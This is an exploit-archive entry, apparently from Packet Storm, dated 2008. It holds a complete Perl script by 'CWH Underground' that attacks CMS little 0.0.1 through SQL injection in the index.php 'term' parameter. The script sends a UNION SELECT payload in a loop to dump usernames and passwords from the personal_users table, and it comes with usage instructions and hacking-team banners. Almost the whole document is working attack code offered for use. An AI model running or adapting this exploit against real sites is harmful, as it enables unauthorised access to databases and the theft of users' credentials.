cmslittle-sql.txt

2008-11-29T00:00:00
ID PACKETSTORM:72415
Type packetstorm
Reporter CWH Underground
Modified 2008-11-29T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
#==========================================================  
# CMS little (index.php term) Remote SQL Injection Exploit  
#==========================================================  
#  
# ,--^----------,--------,-----,-------^--,  
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
# `+---------------------------^----------|  
# `\_,-------, _________________________|  
# / XXXXXX /`| /  
# / XXXXXX / `\ /  
# / XXXXXX /\______(  
# / XXXXXX /   
# / XXXXXX /  
# (________(   
# `------'  
#  
#AUTHOR : CWH Underground  
#DATE : 28 November 2008  
#SITE : cwh.citec.us  
#  
#  
#####################################################  
#APPLICATION : CMS little  
#VERSION : 0.0.1  
#DOWNLOAD : http://downloads.sourceforge.net/littlecms/CMSLite.zip  
######################################################  
#  
#Note: magic_quotes_gpc = off  
#  
#######################################################################################  
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
  
use LWP::UserAgent;  
use HTTP::Request;  
  
if ($#ARGV+1 != 2)  
{  
print "\n==============================================\n";  
print " CMS little Remote SQL Injection Exploit \n";  
print " \n";  
print " Discovered By CWH Underground \n";  
print "==============================================\n";  
print " \n";  
print " ,--^----------,--------,-----,-------^--, \n";  
print " | ||||||||| `--------' | O \n";  
print " `+---------------------------^----------| \n";  
print " `\_,-------, _________________________| \n";  
print " / XXXXXX /`| / \n";  
print " / XXXXXX / `\ / \n";  
print " / XXXXXX /\______( \n";  
print " / XXXXXX / \n";  
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";  
print " (________( \n";  
print " `------' \n";  
print " \n";   
print "Usage : ./xpl.pl <Target> <Data Limit>\n";  
print "Example: ./xpl.pl http://www.target.com/cmslite 10\n";  
exit();  
}  
  
$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];  
$number = $ARGV[1];  
  
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";  
print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";  
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print "\n[+]Dump Username and Password\n";  
  
for ($start=0;$start<$number;$start++) {  
  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";  
$res = $xpl->request($req);  
$info = $res->content;  
$count=$start+1;  
  
if ($info =~ /:::(.+):::/)  
{  
$dump=$1;  
($username,$password)= split('::',$dump);  
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";  
}  
else {   
print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";  
exit;  
}  
  
`